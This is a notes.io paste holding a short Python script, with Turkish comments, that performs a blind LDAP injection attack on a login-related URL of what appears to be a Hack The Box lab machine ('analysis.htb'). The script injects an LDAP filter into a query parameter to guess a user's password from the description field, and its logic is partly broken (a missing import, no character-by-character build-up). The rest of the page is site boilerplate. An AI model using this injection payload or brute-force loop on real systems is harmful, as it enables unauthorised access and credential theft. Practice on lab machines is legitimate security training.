Notes
Notes - notes.io |
import urllib.parse
def blind_ldap_bruteforce(base_url, username, password_candidate):
modified_url = base_url.replace("{FUZZ}", password_candidate).replace("{found_char}", username)
response = requests.get(modified_url)
# Eğer yanıtın içinde belirli bir hata mesajı varsa (örneğin, "Invalid credentials"), başarısız deneme olarak kabul edebilirsiniz
if "Invalid credentials" in response.text:
return False
else:
return True
def main():
ldap_url = "http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description={found_char}{FUZZ}*)"
username = "technician" # Kullanıcı adını belirtin
charset_path = "karakter.txt" # Kullanılacak karakter seti dosyasının yolu
word_to_add = "users" # Karakter setine eklenecek kelime
# Karakter setini oluştur
charset = set()
# karakter.txt dosyasındaki karakterleri ekleyin
with open(charset_path, 'r') as file:
for char in file:
charset.add(char.strip())
# "users" kelimesini karakter setine ekle
charset.add(word_to_add)
# Şifre denemeleri
for password_candidate in charset:
if blind_ldap_bruteforce(ldap_url, username, password_candidate):
print(f"[+] Şifre Bulundu: {password_candidate}")
break # Şifre bulunduğunda döngüden çıkabilirsiniz
if __name__ == "__main__":
main()
|
Notes.io is a web-based application for taking notes. You can take your notes and share with others people. If you like taking long notes, notes.io is designed for you. To date, over 8,000,000,000 notes created and continuing...
With notes.io;
- * You can take a note from anywhere and any device with internet connection.
- * You can share the notes in social platforms (YouTube, Facebook, Twitter, instagram etc.).
- * You can quickly share your contents without website, blog and e-mail.
- * You don't need to create any Account to share a note. As you wish you can use quick, easy and best shortened notes with sms, websites, e-mail, or messaging services (WhatsApp, iMessage, Telegram, Signal).
- * Notes.io has fabulous infrastructure design for a short link and allows you to share the note as an easy and understandable link.
Fast: Notes.io is built for speed and performance. You can take a notes quickly and browse your archive.
Easy: Notes.io doesn’t require installation. Just write and share note!
Short: Notes.io’s url just 8 character. You’ll get shorten link of your note when you want to share. (Ex: notes.io/q )
Free: Notes.io works for 12 years and has been free since the day it was started.
You immediately create your first note and start sharing with the ones you wish. If you want to contact us, you can use the following communication channels;
Email: [email protected]
Twitter: http://twitter.com/notesio
Instagram: http://instagram.com/notes.io
Facebook: http://facebook.com/notesio
Regards;
Notes.io Team